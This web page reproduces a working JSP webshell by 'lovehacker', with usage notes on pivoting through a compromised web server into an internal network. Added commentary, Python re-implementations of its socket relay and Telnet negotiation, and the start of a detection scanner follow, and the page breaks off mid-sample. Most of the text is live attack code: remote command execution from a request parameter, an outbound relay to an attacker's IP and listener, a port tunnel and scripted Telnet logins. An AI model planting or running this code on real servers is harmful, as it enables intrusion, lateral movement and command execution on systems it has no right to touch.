JSP WEBSHELL

xiaoxiao2021-03-06  108

<%
/**
 * Webshell.jsp
 * Author: lovehacker
 * e-mail: wangyun188@hotmail.com
 *
 * Usage:
 *   http://victim/webshell.jsp?[options]
 *
 * Options:
 *   action=piped&remoteHost=&remotePort=&myIp=&myPort=
 *   action=tunnel&remoteHost=&remotePort=&myPort=
 *   action=login&username=&password=&myPort=
 *   action=send&myShell=&myPort=&cmd=
 *   action=close&myPort=
 *   action=shell&cmd=
 *
 * Examples:
 *   action=piped&remoteHost=192.168.0.1&remotePort=25&myIp=218.0.0.1&myPort=12345
 *     Connects port 25 of 192.168.0.1 to port 12345 of 218.0.0.1 (listen there with nc).
 *     Useful when you cannot reach a port on a host in the internal network behind the
 *     compromised web server directly, but the firewall does not filter connections
 *     going out from the web server.
 *   action=tunnel&remoteHost=192.168.0.1&remotePort=23&myPort=65534
 *     Reach the Telnet service of an intranet host by going through webshell.jsp.
 *     (I originally wanted to reach any intranet service this way, but JSP is limited
 *     and that gets complicated.) Useful when the host you control exposes only port 80,
 *     the firewall does not let it connect out to the Internet, and you still want the
 *     Telnet service of a host on the internal network. You also need a valid username
 *     and password for that Telnet host; without one there is nothing to be done.
 *   action=send&myShell=&myPort=&cmd=
 *     Once the previous steps have succeeded, run the command you want on that host.
 *     myShell is the end marker; without it there is no way to tell where the data
 *     stream ends (you must supply it, or you are in for trouble). cmd is the command
 *     to execute, e.g. "which ssh"; I suggest: myShell=lovehacker&cmd=ls -la;echo lovehacker
 *   action=close&myPort=
 *     You have logged out of Telnet, but the program opened on the host has not exited,
 *     so run this to clean up after yourself.
 *   action=shell&cmd=
 *     Run a command on the machine you control, e.g.
 *     Unix:    /bin/sh -c tar vxf xxx.tar
 *     Windows: c:/winnt/system32/cmd.exe /c c:/winnt/win.ini
 *
 * Program description:
 *   Implementing a Telnet proxy in JSP gave me a headache: every request is a new
 *   thread, and a client socket to the Telnet service can only run commands in batch,
 *   with no interaction with the user. So I settled on a clumsy approach: when the
 *   tunnel command arrives, start two threads, one listening on a ServerSocket and
 *   waiting for connections, the other holding a connection to the remote server's
 *   port that stays open all the time. Whatever the server socket receives is forwarded
 *   to the remote server, so the session state is kept and the user can really
 *   interact. I still feel this is too stupid a method; if you have a better way to
 *   implement a Telnet proxy in JSP, please let me know.
 *
 * Copyright:
 *   This was modified from the Telnet code, so you may modify and copy anything in it.
 *   If you add new features, don't forget to mail me a copy!
 */
%>
<%@ page import="java.io.*" %>
<%@ page import="java.net.*" %>
<%@ page import="java.util.*" %>
<%@ page import="java.awt.Dimension" %>
<%!
// One direction of a two-way socket relay: copies bytes from local to remote until
// either side closes, then tears down both sockets and detaches its companion so the
// opposite direction stops too.  Used in pairs by piped.
class redirector implements Runnable {
    private redirector companion = null;
    private Socket localSocket, remoteSocket;
    private InputStream from;
    private OutputStream to;
    private byte[] buffer = new byte[4096];

    public redirector(Socket local, Socket remote) {
        try {
            localSocket = local;
            remoteSocket = remote;
            from = localSocket.getInputStream();
            to = remoteSocket.getOutputStream();
        } catch (Exception e) {}
    }

    public void couple(redirector c) {
        companion = c;
        Thread listen = new Thread(this);
        listen.start();
    }

    public void decouple() {
        companion = null;
    }

    public void run() {
        int count;
        try {
            while (companion != null) {
                if ((count = from.read(buffer)) < 0) break;
                to.write(buffer, 0, count);
            }
        } catch (Exception e) {}
        try {
            from.close();
            to.close();
            localSocket.close();
            remoteSocket.close();
            if (companion != null) companion.decouple();
        } catch (Exception io) {}
    }
}

// Variant used by the tunnel: the same relay, but it watches the stream for a close
// marker.  On the marker it closes both sockets and calls System.exit(1), which kills
// the whole servlet container JVM, not just this session.  At normal EOF it only
// detaches from its companion and leaves the sockets open, so the connection to the
// remote Telnet service survives across HTTP requests (as reconstructed from this page).
class redirector1 implements Runnable {
    // The marker string itself is lost in this copy of the page; "close" is an assumption.
    private static final String CLOSE_MARKER = "close";
    private redirector1 companion = null;
    private Socket localSocket, remoteSocket;
    private InputStream from;
    private OutputStream to;
    private byte[] buffer = new byte[4096];

    public redirector1(Socket local, Socket remote) {
        try {
            localSocket = local;
            remoteSocket = remote;
            from = localSocket.getInputStream();
            to = remoteSocket.getOutputStream();
        } catch (Exception e) {}
    }

    public void couple(redirector1 c) {
        companion = c;
        Thread listen = new Thread(this);
        listen.start();
    }

    public void decouple() {
        companion = null;
    }

    public void run() {
        String tmp;
        int count;
        try {
            while (companion != null) {
                if ((count = from.read(buffer)) < 0) break;
                tmp = new String(buffer, 0, count);
                if (tmp.startsWith(CLOSE_MARKER)) {
                    from.close();
                    to.close();
                    remoteSocket.close();
                    localSocket.close();
                    System.exit(1);
                }
                to.write(buffer, 0, count);
            }
        } catch (Exception e) {}
        try {
            if (companion != null) companion.decouple();
        } catch (Exception io) {}
    }
}

// Outbound pivot for action=piped: connects to two hosts (the intranet target and the
// attacker's listener) and relays between them, so the target is reached without any
// inbound connection to the web server.
class piped implements Runnable {
    String remoteHost1, remoteHost2;
    int remotePort1, remotePort2;
    Thread listener, connection;

    public piped(String raddr1, int rport1, String raddr2, int rport2) {
        remoteHost1 = raddr1;
        remotePort1 = rport1;
        remoteHost2 = raddr2;
        remotePort2 = rport2;
        listener = new Thread(this);
        listener.setPriority(Thread.MIN_PRIORITY);
        listener.start();
    }

    public void run() {
        Socket destinationSocket1 = null;
        Socket destinationSocket2 = null;
        try {
            destinationSocket1 = new Socket(remoteHost1, remotePort1);
            destinationSocket2 = new Socket(remoteHost2, remotePort2);
            redirector r1 = new redirector(destinationSocket1, destinationSocket2);
            redirector r2 = new redirector(destinationSocket2, destinationSocket1);
            r1.couple(r2);
            r2.couple(r1);
        } catch (Exception e) {
            try {
                // If the first connect failed there is nobody to report to yet.
                if (destinationSocket2 != null) {
                    DataOutputStream os = new DataOutputStream(destinationSocket2.getOutputStream());
                    os.writeChars("Remote host refused connection.\n");
                    destinationSocket2.close();
                }
            } catch (IOException ioe) {}
        }
    }
}

// Listener-side tunnel for action=tunnel: binds myPort on the web server, keeps one
// connection to the remote Telnet service open, and relays every accepted local
// connection over it.  The ServerSocket binds on all interfaces, not only localhost,
// so anyone who can reach myPort gets the Telnet session too.
class tunnel implements Runnable {
    String remoteHost;
    int localPort, remotePort;
    Thread listener, connection;
    ServerSocket server;

    public tunnel(int lport, String raddr, int rport) {
        localPort = lport;
        remoteHost = raddr;
        remotePort = rport;
        try {
            server = new ServerSocket(localPort);
        } catch (Exception e) {}
        listener = new Thread(this);
        listener.setPriority(Thread.MIN_PRIORITY);
        listener.start();
    }

    public void run() {
        if (server == null) return;   // bind failed; without this the loop below would spin
        Socket destinationSocket = null;
        try {
            destinationSocket = new Socket(remoteHost, remotePort);
        } catch (Exception e) {}
        while (true) {
            Socket localSocket = null;
            try {
                localSocket = server.accept();
            } catch (Exception e) {
                continue;
            }
            try {
                redirector1 r1 = new redirector1(localSocket, destinationSocket);
                redirector1 r2 = new redirector1(destinationSocket, localSocket);
                r1.couple(r2);
                r2.couple(r1);
            } catch (Exception e) {
                try {
                    DataOutputStream os = new DataOutputStream(localSocket.getOutputStream());
                    os.writeChars("Remote host refused connection.\n");
                    localSocket.close();
                } catch (IOException ioe) {}
                continue;
            }
        }
    }
}
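The relay that piped and tunnel build out of redirector pairs, shown as an added example in Python rather than the page's Java (this is my own illustration, not code from the webshell): two socketpairs stand in for the client-side and intranet-side TCP connections, a stub service plays the remote host, and couple() starts one pump thread per direction the way r1.couple(r2); r2.couple(r1) does above. The names _pump, couple and run_through_relay are this example's own; nothing here touches the network.

```python
import socket
import threading

BUFSIZE = 4096


def _pump(src, dst, stop):
    # One direction of the relay, the counterpart of redirector.run(): copy until EOF
    # or a socket error, then shut both ends so the opposite pump sees EOF and exits.
    try:
        while not stop.is_set():
            chunk = src.recv(BUFSIZE)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        stop.set()
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass          # already closed by the other pump
            s.close()


def couple(a, b):
    # Counterpart of r1.couple(r2); r2.couple(r1): one thread per direction, sharing
    # a stop flag the way the two redirectors share the companion reference.
    stop = threading.Event()
    threads = (threading.Thread(target=_pump, args=(a, b, stop), daemon=True),
               threading.Thread(target=_pump, args=(b, a, stop), daemon=True))
    for t in threads:
        t.start()
    return threads


def run_through_relay(payload):
    # Whole picture, offline: client <-> relay <-> stub "intranet" service.
    client_end, relay_client = socket.socketpair()
    relay_remote, remote_end = socket.socketpair()

    def stub_service():
        # Stand-in for the intranet host: reads one request, answers upper-cased, hangs up.
        request = remote_end.recv(BUFSIZE)
        remote_end.sendall(request.upper())
        remote_end.close()

    threading.Thread(target=stub_service, daemon=True).start()
    threads = couple(relay_client, relay_remote)

    client_end.sendall(payload)
    reply = b""
    while True:
        chunk = client_end.recv(BUFSIZE)
        if not chunk:          # EOF: the remote hung up and the relay propagated it
            break
        reply += chunk
    client_end.close()
    for t in threads:
        t.join(timeout=2)
    return reply


if __name__ == "__main__":
    print(run_through_relay(b"ls -la\r"))
```

The point the stub makes visible is the teardown rule: the side that hits EOF closes both sockets, which is the only reason the other pump thread ever stops. redirector1 deliberately drops that rule to keep the Telnet side alive between requests, which is also why the webshell needs a separate close action.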

// Telnet option negotiation, taken from the Telnet applet's TelnetIO.java.  It strips
// IAC sequences out of the byte stream, answers WILL/WONT/DO/DONT with a fixed policy
// (accept ECHO and EOR from the server, offer ECHO and TTYPE, refuse everything else)
// and replies to the TTYPE subnegotiation with a terminal type.
class TelnetIO {
    public String toString() {
        return "$Id: TelnetIO.java,v 1.10 1998/02/09 10:22:18 leo Exp $";
    }

    private int debug = 0;
    private byte neg_state = 0;

    private final static byte STATE_DATA = 0;
    private final static byte STATE_IAC = 1;
    private final static byte STATE_IACSB = 2;
    private final static byte STATE_IACWILL = 3;
    private final static byte STATE_IACDO = 4;
    private final static byte STATE_IACWONT = 5;
    private final static byte STATE_IACDONT = 6;
    private final static byte STATE_IACSBIAC = 7;
    private final static byte STATE_IACSBDATA = 8;
    private final static byte STATE_IACSBDATAIAC = 9;

    private byte current_sb;

    private final static byte IAC = (byte) 255;
    private final static byte EOR = (byte) 239;
    private final static byte WILL = (byte) 251;
    private final static byte WONT = (byte) 252;
    private final static byte DO = (byte) 253;
    private final static byte DONT = (byte) 254;
    private final static byte SB = (byte) 250;
    private final static byte SE = (byte) 240;

    private final static byte TELOPT_ECHO = (byte) 1;   /* echo on/off */
    private final static byte TELOPT_EOR = (byte) 25;   /* end of record */
    private final static byte TELOPT_NAWS = (byte) 31;  /* negotiate about window size */
    private final static byte TELOPT_TTYPE = (byte) 24; /* terminal type */

    private final byte[] IACWILL = { IAC, WILL };
    private final byte[] IACWONT = { IAC, WONT };
    private final byte[] IACDO = { IAC, DO };
    private final byte[] IACDONT = { IAC, DONT };
    private final byte[] IACSB = { IAC, SB };
    private final byte[] IACSE = { IAC, SE };

    private final byte TELQUAL_IS = (byte) 0;
    private final byte TELQUAL_SEND = (byte) 1;

    // Per-option negotiation state, indexed by option + 128: what the peer last sent
    // and what we last answered, so the same reply is not sent twice.
    private byte[] receivedDX;
    private byte[] receivedWX;
    private byte[] sentDX;
    private byte[] sentWX;

    private Socket socket;
    private BufferedInputStream is;
    private BufferedOutputStream os;

    // private StatusPeer peer = this; /* peer, notified on status */

    public void connect(String address, int port) throws IOException {
        if (debug > 0) System.out.println("TelnetIO.connect(" + address + "," + port + ")");
        socket = new Socket(address, port);
        is = new BufferedInputStream(socket.getInputStream());
        os = new BufferedOutputStream(socket.getOutputStream());
        neg_state = 0;
        receivedDX = new byte[256];
        sentDX = new byte[256];
        receivedWX = new byte[256];
        sentWX = new byte[256];
    }

    public void disconnect() throws IOException {
        if (debug > 0) System.out.println("TelnetIO.disconnect()");
        if (socket != null) socket.close();
    }

    public void connect(String address) throws IOException {
        connect(address, 23);
    }

    // public void setPeer(StatusPeer obj) { peer = obj; }

    public int available() throws IOException {
        return is.available();
    }

    // Non-blocking read: returns whatever is buffered right now (possibly nothing),
    // with Telnet negotiation already stripped out and answered.
    public byte[] receive() throws IOException {
        int count = is.available();
        byte buf[] = new byte[count];
        count = is.read(buf);
        if (count < 0) throw new IOException("Connection closed.");
        if (debug > 1) System.out.println("TelnetIO.receive(): read bytes: " + count);
        buf = negotiate(buf, count);
        return buf;
    }

    public void send(byte[] buf) throws IOException {
        if (debug > 1) System.out.println("TelnetIO.send(" + buf + ")");
        os.write(buf);
        os.flush();
    }

    public void send(byte b) throws IOException {
        if (debug > 1) System.out.println("TelnetIO.send(" + b + ")");
        os.write(b);
        os.flush();
    }

    // Subnegotiation: only TTYPE SEND is handled, answered with IAC SB TTYPE IS <type> IAC SE.
    private void handle_sb(byte type, byte[] sbdata, int sbcount) throws IOException {
        if (debug > 1) System.out.println("TelnetIO.handle_sb(" + type + ")");
        switch (type) {
            case TELOPT_TTYPE:
                if (sbcount > 0 && sbdata[0] == TELQUAL_SEND) {
                    String ttype;
                    send(IACSB);
                    send(TELOPT_TTYPE);
                    send(TELQUAL_IS);
                    /* FIXME: need more logic here if we use more than one terminal type */
                    Vector vec = new Vector(2);
                    vec.addElement("TTYPE");
                    ttype = (String) notifyStatus(vec);
                    if (ttype == null) ttype = "dumb";
                    send(ttype.getBytes("ISO-8859-1"));
                    send(IACSE);
                }
        }
    }

    // Status callback; the applet's terminal hooked in here.  Returning null means no
    // terminal type and no window size, which is why NAWS is refused below.
    public Object notifyStatus(Vector status) {
        if (debug > 0) System.out.println("TelnetIO.notifyStatus(" + status + ")");
        return null;
    }

    // State machine over the raw bytes: data bytes go to nbuf, IAC sequences are
    // consumed and answered, subnegotiation payload is collected in sbbuf.  neg_state
    // persists across calls, so a sequence split over two reads is handled.
    private byte[] negotiate(byte buf[], int count) throws IOException {
        if (debug > 1) System.out.println("TelnetIO.negotiate(" + buf + "," + count + ")");
        byte nbuf[] = new byte[count];
        byte sbbuf[] = new byte[count];
        byte sendbuf[] = new byte[3];
        byte b, reply;
        int sbcount = 0;
        int boffset = 0, noffset = 0;
        Vector vec = new Vector(2);

        while (boffset < count) {
            b = buf[boffset++];
            switch (neg_state) {
            case STATE_DATA:
                if (b == IAC) {
                    neg_state = STATE_IAC;
                } else {
                    nbuf[noffset++] = b;
                }
                break;
            case STATE_IAC:
                switch (b) {
                case IAC:
                    if (debug > 2) System.out.print("IAC ");
                    nbuf[noffset++] = IAC;       // escaped 0xff data byte
                    neg_state = STATE_DATA;
                    break;
                case WILL:
                    if (debug > 2) System.out.print("WILL ");
                    neg_state = STATE_IACWILL;
                    break;
                case WONT:
                    if (debug > 2) System.out.print("WONT ");
                    neg_state = STATE_IACWONT;
                    break;
                case DONT:
                    if (debug > 2) System.out.print("DONT ");
                    neg_state = STATE_IACDONT;
                    break;
                case DO:
                    if (debug > 2) System.out.print("DO ");
                    neg_state = STATE_IACDO;
                    break;
                case EOR:
                    if (debug > 2) System.out.print("EOR ");
                    neg_state = STATE_DATA;
                    break;
                case SB:
                    if (debug > 2) System.out.print("SB ");
                    neg_state = STATE_IACSB;
                    sbcount = 0;
                    break;
                default:
                    if (debug > 2) System.out.print("<UNKNOWN " + b + "> ");
                    neg_state = STATE_DATA;
                    break;
                }
                break;
            case STATE_IACWILL:
                switch (b) {
                case TELOPT_ECHO:
                    if (debug > 2) System.out.println("ECHO");
                    reply = DO;
                    vec = new Vector(2);
                    vec.addElement("NOLOCALECHO");
                    notifyStatus(vec);
                    break;
                case TELOPT_EOR:
                    if (debug > 2) System.out.println("EOR");
                    reply = DO;
                    break;
                default:
                    if (debug > 2) System.out.println("<UNKNOWN," + b + ">");
                    reply = DONT;
                    break;
                }
                if (debug > 1) System.out.println("<" + b + ", WILL=" + WILL + ">");
                if (reply != sentDX[b + 128] || WILL != receivedWX[b + 128]) {
                    sendbuf[0] = IAC;
                    sendbuf[1] = reply;
                    sendbuf[2] = b;
                    send(sendbuf);
                    sentDX[b + 128] = reply;
                    receivedWX[b + 128] = WILL;
                }
                neg_state = STATE_DATA;
                break;
            case STATE_IACWONT:
                switch (b) {
                case TELOPT_ECHO:
                    if (debug > 2) System.out.println("ECHO");
                    vec = new Vector(2);
                    vec.addElement("LOCALECHO");
                    notifyStatus(vec);
                    reply = DONT;
                    break;
                case TELOPT_EOR:
                    if (debug > 2) System.out.println("EOR");
                    reply = DONT;
                    break;
                default:
                    if (debug > 2) System.out.println("<UNKNOWN," + b + ">");
                    reply = DONT;
                    break;
                }
                if (reply != sentDX[b + 128] || WONT != receivedWX[b + 128]) {
                    sendbuf[0] = IAC;
                    sendbuf[1] = reply;
                    sendbuf[2] = b;
                    send(sendbuf);
                    sentDX[b + 128] = reply;
                    receivedWX[b + 128] = WONT;
                }
                neg_state = STATE_DATA;
                break;
            case STATE_IACDO:
                switch (b) {
                case TELOPT_ECHO:
                    if (debug > 2) System.out.println("ECHO");
                    reply = WILL;
                    vec = new Vector(2);
                    vec.addElement("LOCALECHO");
                    notifyStatus(vec);
                    break;
                case TELOPT_TTYPE:
                    if (debug > 2) System.out.println("TTYPE");
                    reply = WILL;
                    break;
                case TELOPT_NAWS: {
                    if (debug > 2) System.out.println("NAWS");
                    vec = new Vector(2);
                    vec.addElement("NAWS");
                    Dimension size = (Dimension) notifyStatus(vec);
                    receivedDX[b + 128] = DO;
                    if (size == null) {
                        /* no window size known: refuse the option */
                        send(IAC);
                        send(WONT);
                        send(TELOPT_NAWS);
                        reply = WONT;
                        sentWX[b + 128] = WONT;
                        break;
                    }
                    reply = WILL;
                    sentWX[b + 128] = WILL;
                    sendbuf[0] = IAC;
                    sendbuf[1] = WILL;
                    sendbuf[2] = TELOPT_NAWS;
                    send(sendbuf);
                    send(IAC);
                    send(SB);
                    send(TELOPT_NAWS);
                    send((byte) (size.width >> 8));
                    send((byte) (size.width & 0xff));
                    send((byte) (size.height >> 8));
                    send((byte) (size.height & 0xff));
                    send(IAC);
                    send(SE);
                    break;
                }
                default:
                    if (debug > 2) System.out.println("<UNKNOWN," + b + ">");
                    reply = WONT;
                    break;
                }
                if (reply != sentWX[b + 128] || DO != receivedDX[b + 128]) {
                    sendbuf[0] = IAC;
                    sendbuf[1] = reply;
                    sendbuf[2] = b;
                    send(sendbuf);
                    sentWX[b + 128] = reply;
                    receivedDX[b + 128] = DO;
                }
                neg_state = STATE_DATA;
                break;
            case STATE_IACDONT:
                switch (b) {
                case TELOPT_ECHO:
                    if (debug > 2) System.out.println("ECHO");
                    reply = WONT;
                    vec = new Vector(2);
                    vec.addElement("NOLOCALECHO");
                    notifyStatus(vec);
                    break;
                case TELOPT_NAWS:
                    if (debug > 2) System.out.println("NAWS");
                    reply = WONT;
                    break;
                default:
                    if (debug > 2) System.out.println("<UNKNOWN," + b + ">");
                    reply = WONT;
                    break;
                }
                if (reply != sentWX[b + 128] || DONT != receivedDX[b + 128]) {
                    send(IAC);
                    send(reply);
                    send(b);
                    sentWX[b + 128] = reply;
                    receivedDX[b + 128] = DONT;
                }
                neg_state = STATE_DATA;
                break;
            case STATE_IACSBIAC:
                if (debug > 2) System.out.println("" + b + " ");
                if (b == IAC) {
                    sbcount = 0;
                    current_sb = b;
                    neg_state = STATE_IACSBDATA;
                } else {
                    System.out.println("(bad) " + b + " ");
                    neg_state = STATE_DATA;
                }
                break;
            case STATE_IACSB:
                if (debug > 2) System.out.println("" + b + " ");
                switch (b) {
                case IAC:
                    neg_state = STATE_IACSBIAC;
                    break;
                default:
                    current_sb = b;
                    sbcount = 0;
                    neg_state = STATE_IACSBDATA;
                    break;
                }
                break;
            case STATE_IACSBDATA:
                if (debug > 2) System.out.println("" + b + " ");
                switch (b) {
                case IAC:
                    neg_state = STATE_IACSBDATAIAC;
                    break;
                default:
                    sbbuf[sbcount++] = b;
                    break;
                }
                break;
            case STATE_IACSBDATAIAC:
                if (debug > 2) System.out.println("" + b + " ");
                switch (b) {
                case IAC:
                    neg_state = STATE_IACSBDATA;
                    sbbuf[sbcount++] = IAC;      // escaped 0xff inside the subnegotiation
                    break;
                case SE:
                    handle_sb(current_sb, sbbuf, sbcount);
                    current_sb = 0;
                    neg_state = STATE_DATA;
                    break;
                case SB:
                    handle_sb(current_sb, sbbuf, sbcount);
                    neg_state = STATE_IACSB;
                    break;
                default:
                    neg_state = STATE_DATA;
                    break;
                }
                break;
            default:
                if (debug > 2) System.out.println("This should not happen: " + neg_state + " ");
                neg_state = STATE_DATA;
                break;
            }
        }
        buf = new byte[noffset];
        System.arraycopy(nbuf, 0, buf, 0, noffset);
        return buf;
    }
}

// Thin client over TelnetIO used by the login/send actions.  It connects to the
// tunnel's listener on localhost:myPort and scrapes the Telnet session for prompts.
class TelnetConnect {
    TelnetIO tio = new TelnetIO();
    int port = 0;

    public TelnetConnect(int port) {
        this.port = port;
    }

    public void connect() {
        try {
            tio.connect("localhost", port);
        } catch (IOException e) {}
    }

    public void disconnect() {
        try {
            tio.disconnect();
        } catch (IOException e) {}
    }

    // Busy-waits until the prompt shows up in one receive() chunk.  If the remote side
    // never sends it (wrong prompt string, dead session), the request thread spins forever.
    public String wait(String prompt) {
        String tmp = "";
        do {
            try {
                tmp = new String(tio.receive(), "ISO-8859-1");
            } catch (IOException e) {}
        } while (tmp.indexOf(prompt) == -1);
        return tmp;
    }

    public byte[] received() {
        byte[] temp = null;
        try {
            temp = tio.receive();
        } catch (IOException e) {}
        return temp;
    }

    // Same busy-wait, for any of the usual shell prompt characters.
    public String waitShell() {
        String tmp = "";
        do {
            try {
                tmp = new String(tio.receive(), "ISO-8859-1");
            } catch (IOException e) {}
        } while (tmp.indexOf("$") == -1 && tmp.indexOf("#") == -1 && tmp.indexOf("%") == -1);
        return tmp;
    }

    public void send(String str) {
        try {
            tio.send(str.getBytes("ISO-8859-1"));
        } catch (IOException e) {}
    }
}
%>
<%
String action = request.getParameter("action");
String cmd = request.getParameter("cmd");
String remoteHost = request.getParameter("remoteHost");
String myIp = request.getParameter("myIp");
String myPort = request.getParameter("myPort");
String remotePort = request.getParameter("remotePort");
String username = request.getParameter("username");
String password = request.getParameter("password");
String myShell = request.getParameter("myShell");

if (action.equals("shell")) {
    // Runtime.exec(String) splits cmd on whitespace with a StringTokenizer; shell quoting
    // is not interpreted, so "/bin/sh -c tar vxf xxx.tar" runs sh -c tar with "vxf" and
    // "xxx.tar" as positional arguments.  Only stdout is read back; stderr is never
    // drained, so a command that writes a lot to stderr can block.
    try {
        Process child = Runtime.getRuntime().exec(cmd);
        InputStream in = child.getInputStream();
        int c;
        while ((c = in.read()) != -1) {
            out.print((char) c);
        }
        in.close();
        try {
            child.waitFor();
        } catch (InterruptedException e) {}
    } catch (IOException e) {}
} else if (action.equals("piped")) {
    piped me = new piped(remoteHost, Integer.parseInt(remotePort), myIp, Integer.parseInt(myPort));
} else if (action.equals("tunnel")) {
    tunnel me = new tunnel(Integer.parseInt(myPort), remoteHost, Integer.parseInt(remotePort));
} else if (action.equals("login")) {
    TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort));
    tc.connect();
    out.print(tc.wait("login:"));
    tc.send(username + "\r");
    out.print(tc.wait("Password:"));
    tc.send(password + "\r");
    out.print(tc.waitShell());
    tc.disconnect();
} else if (action.equals("send")) {
    TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort));
    tc.connect();
    tc.send(cmd + "\r");
    // Reconstructed from the usage notes above: myShell is the end marker, so read until it appears.
    out.print(tc.wait(myShell));
    tc.disconnect();
}
// This copy of the page is cut off here; the "close" branch described in the usage
// notes is not present.
%>
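The negotiation state machine in TelnetIO.negotiate() above, as an added Python example (my own code, not part of the page or of the Telnet applet it was taken from): TelnetNegotiator.feed() consumes raw bytes from the server and returns the application data with IAC sequences removed plus the bytes to send back, using the same policy (DO for ECHO and EOR, WILL for ECHO and TTYPE, refuse the rest, TTYPE SEND answered with a terminal type) and the same sent/received tables that stop the client from re-answering an option it has already settled. It keeps the subnegotiation states simpler than the Java (the IACSBIAC corner is folded into SB) and the class and method names are this example's own.

```python
IAC, DONT, DO, WONT, WILL, SB, SE, EOR = 255, 254, 253, 252, 251, 250, 240, 239
TELOPT_ECHO, TELOPT_TTYPE, TELOPT_EOR, TELOPT_NAWS = 1, 24, 25, 31
TELQUAL_IS, TELQUAL_SEND = 0, 1
VERBS = {WILL: "WILL", WONT: "WONT", DO: "DO", DONT: "DONT"}


class TelnetNegotiator:
    """Client-side Telnet option negotiation with TelnetIO.negotiate()'s policy."""

    def __init__(self, terminal_type=b"dumb"):
        self.terminal_type = terminal_type
        self.state = "DATA"      # mirrors neg_state; survives across feed() calls
        self.sb_opt = None
        self.sb_data = bytearray()
        self.sent = {}           # (side, option) -> verb we last sent (sentDX / sentWX)
        self.received = {}       # (side, option) -> verb the peer last sent (receivedWX / receivedDX)

    @staticmethod
    def _policy(verb, opt):
        # Accept server ECHO and EOR, offer ECHO and TTYPE, refuse everything else
        # (NAWS included, since no window size is known without a terminal).
        if verb == "WILL":
            return DO if opt in (TELOPT_ECHO, TELOPT_EOR) else DONT
        if verb == "DO":
            return WILL if opt in (TELOPT_ECHO, TELOPT_TTYPE) else WONT
        return DONT if verb == "WONT" else WONT

    def _handle_sb(self):
        # Counterpart of handle_sb(): TTYPE SEND -> IAC SB TTYPE IS <name> IAC SE.
        if self.sb_opt == TELOPT_TTYPE and self.sb_data[:1] == bytes([TELQUAL_SEND]):
            return (bytes([IAC, SB, TELOPT_TTYPE, TELQUAL_IS]) + self.terminal_type
                    + bytes([IAC, SE]))
        return b""

    def feed(self, data):
        """Consume raw bytes; return (application data, bytes to send back to the peer)."""
        clean, reply_out = bytearray(), bytearray()
        for b in data:
            st = self.state
            if st == "DATA":
                if b == IAC:
                    self.state = "IAC"
                else:
                    clean.append(b)
            elif st == "IAC":
                if b == IAC:                     # escaped 0xff data byte
                    clean.append(IAC)
                    self.state = "DATA"
                elif b in VERBS:
                    self.state = VERBS[b]
                elif b == SB:
                    self.sb_data = bytearray()
                    self.state = "SB"
                else:                            # EOR, NOP, GA, ...: commands without operand
                    self.state = "DATA"
            elif st in ("WILL", "WONT", "DO", "DONT"):
                verb, opt = st, b
                reply = self._policy(verb, opt)
                key = ("peer", opt) if verb in ("WILL", "WONT") else ("us", opt)
                # Same dedup as TelnetIO: answer only when something changed, which is
                # what keeps two endpoints from looping on WILL/DO forever.
                if self.sent.get(key) != reply or self.received.get(key) != verb:
                    reply_out += bytes([IAC, reply, opt])
                    self.sent[key] = reply
                    self.received[key] = verb
                self.state = "DATA"
            elif st == "SB":
                self.sb_opt = b
                self.state = "SBDATA"
            elif st == "SBDATA":
                if b == IAC:
                    self.state = "SBDATAIAC"
                else:
                    self.sb_data.append(b)
            elif st == "SBDATAIAC":
                if b == IAC:                     # escaped 0xff inside the subnegotiation
                    self.sb_data.append(IAC)
                    self.state = "SBDATA"
                else:                            # SE ends it; anything else is malformed
                    if b == SE:
                        reply_out += self._handle_sb()
                    self.state = "DATA"
        return bytes(clean), bytes(reply_out)


if __name__ == "__main__":
    # Constructed server greeting: WILL ECHO, DO TTYPE, a TTYPE SEND, then a prompt.
    neg = TelnetNegotiator()
    greeting = (bytes([IAC, WILL, TELOPT_ECHO, IAC, DO, TELOPT_TTYPE,
                       IAC, SB, TELOPT_TTYPE, TELQUAL_SEND, IAC, SE]) + b"login: ")
    print(neg.feed(greeting))
```

Because the state is kept on the object, a sequence that arrives split across two receive() calls (IAC in one chunk, WILL and the option in the next) is still handled, which is the case the one-shot `new byte[count]` read in TelnetIO.receive() makes common.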
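For anyone who meets this page from the defensive side, the useful question is how to recognise the file on a server. The scanner below is an added example (my own Python, not code from the page): it pulls out the three things that make this webshell what it is, a Runtime.exec() whose argument flows straight from request.getParameter(), a ServerSocket the page binds itself, and outbound Socket connections, and combines them into a verdict. Both JSP inputs are constructed for the example: one paraphrases this page's scriptlet, the other is a harmless page that only echoes a parameter. The function names and the indicator labels are this example's own.

```python
import re

# String x = request.getParameter("name")  ->  x is attacker-controlled
PARAM_ASSIGN = re.compile(r'String\s+(\w+)\s*=\s*request\.getParameter\s*\(\s*"(\w+)"\s*\)')
EXEC_CALL = re.compile(r'Runtime\.getRuntime\(\)\s*\.exec\s*\(([^)]*)\)')
SERVER_SOCKET = re.compile(r'new\s+ServerSocket\s*\(')
CLIENT_SOCKET = re.compile(r'new\s+Socket\s*\(')
IDENT = re.compile(r'[A-Za-z_]\w*')


def scan_jsp(source):
    """Return a list of (indicator, detail) pairs found in one JSP file's source."""
    findings = []
    tainted = dict(PARAM_ASSIGN.findall(source))    # variable -> parameter name
    for m in EXEC_CALL.finditer(source):
        arg = m.group(1).strip()
        # A request parameter used directly as the command is the webshell signature;
        # exec() of a literal is still worth a look but is a much weaker signal.
        used = [v for v in IDENT.findall(arg) if v in tainted]
        if used:
            findings.append(("exec_from_request_param",
                             "exec(%s) runs parameter %r" % (arg, tainted[used[0]])))
        else:
            findings.append(("exec_call", "exec(%s)" % arg))
    if SERVER_SOCKET.search(source):
        findings.append(("bind_listener",
                         "page binds its own ServerSocket (bind shell / tunnel endpoint)"))
    if CLIENT_SOCKET.search(source):
        findings.append(("outbound_socket",
                         "page opens outbound TCP connections (pivot / reverse tunnel)"))
    return findings


def is_webshell(source):
    """Conservative verdict: command execution driven by a request parameter, or a
    page that both listens and connects out (the tunnel pattern above)."""
    kinds = {k for k, _ in scan_jsp(source)}
    return "exec_from_request_param" in kinds or {"bind_listener", "outbound_socket"} <= kinds


# Constructed sample: a condensed paraphrase of the scriptlet on this page.
WEBSHELL_SAMPLE = r'''<%@ page import="java.io.*" %><%@ page import="java.net.*" %>
<%! class tunnel implements Runnable {
    ServerSocket server; Socket remote;
    public tunnel(int lport, String raddr, int rport) throws IOException {
        server = new ServerSocket(lport); remote = new Socket(raddr, rport); }
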